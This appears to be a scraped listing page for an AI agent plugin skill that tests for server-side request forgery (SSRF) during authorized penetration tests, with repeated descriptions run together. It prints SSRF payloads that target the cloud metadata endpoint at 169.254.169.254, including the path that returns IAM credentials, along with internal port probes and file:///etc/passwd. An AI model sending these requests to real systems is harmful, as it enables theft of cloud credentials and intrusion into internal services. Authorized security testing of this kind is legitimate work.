npx claudepluginhub plurigrid/asi --plugin asiThis skill uses the workspace's default tool permissions.
- When conducting security assessments that involve performing ssrf vulnerability exploitation
Tests SSRF vulnerabilities by probing AWS/GCP/Azure metadata endpoints, internal HTTP port scanning, protocol handlers, and bypasses like DNS rebinding via user-controllable URLs.
Identifies and exploits SSRF vulnerabilities to access internal services, cloud metadata, and restricted resources during authorized penetration tests.
Detects SSRF vulnerabilities in user-controlled URL parameters by probing AWS/GCP/Azure metadata endpoints (169.254.169.254), internal services via HTTP port scans, protocol handlers, URL bypasses, and DNS rebinding.
Share bugs, ideas, or general feedback.
pip install requestshttp://169.254.169.254/latest/meta-data/http://127.0.0.1:port/, http://10.0.0.1/file:///etc/passwd, gopher://, dict://# For authorized penetration testing and lab environments only
python scripts/agent.py --target-url https://app.example.com/fetch?url= --output ssrf_report.json
GET /fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
If the response contains AWS credentials (AccessKeyId, SecretAccessKey), SSRF is confirmed with critical impact.